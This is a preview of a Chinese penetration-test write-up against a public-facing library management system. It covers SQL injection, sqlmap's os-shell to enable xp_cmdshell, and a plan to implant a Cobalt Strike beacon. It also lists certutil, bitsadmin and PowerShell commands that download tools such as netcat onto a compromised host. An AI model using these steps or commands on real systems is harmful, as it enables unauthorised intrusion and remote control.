文章预览
一、图书馆管理系统 1.1 SQL注入开启xp_cmdshell 1.1.1 首先是图书馆管理系统,这个系统是开在公网的。目录扫描发现Web Api Help接口文档泄露。我们拼接上图的第二个接口,发现在szReaderID参数处传入单数个单引号,就会报错;传入双数个单引号,就会回显操作成功。证明很可能存在注入。 1.1.2 sqlmap跑一下。因为是sql server,所以可以直接--os-shell开启xp_cmdshell来命令执行。当前的权限还很低,为了进一步提权,得上个CS马。 1.2 尝试远程下载上线CS 1.2.1 以下是一些常用的远程下载命令 certutil -urlcache -split -f http://127.0.0.1:8080/nc.txt c:\\nc.txt //certutil下载文件 bitsadmin /rawreturn /transfer getfile http://download.sysinternals.com/files/PSTools.zip c:\\Pstools.zip //bitsadmin下载文件 powershell -nop -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://127.0.0.1/nc.txt','nc.exe') //powershell下载文件
………………………………
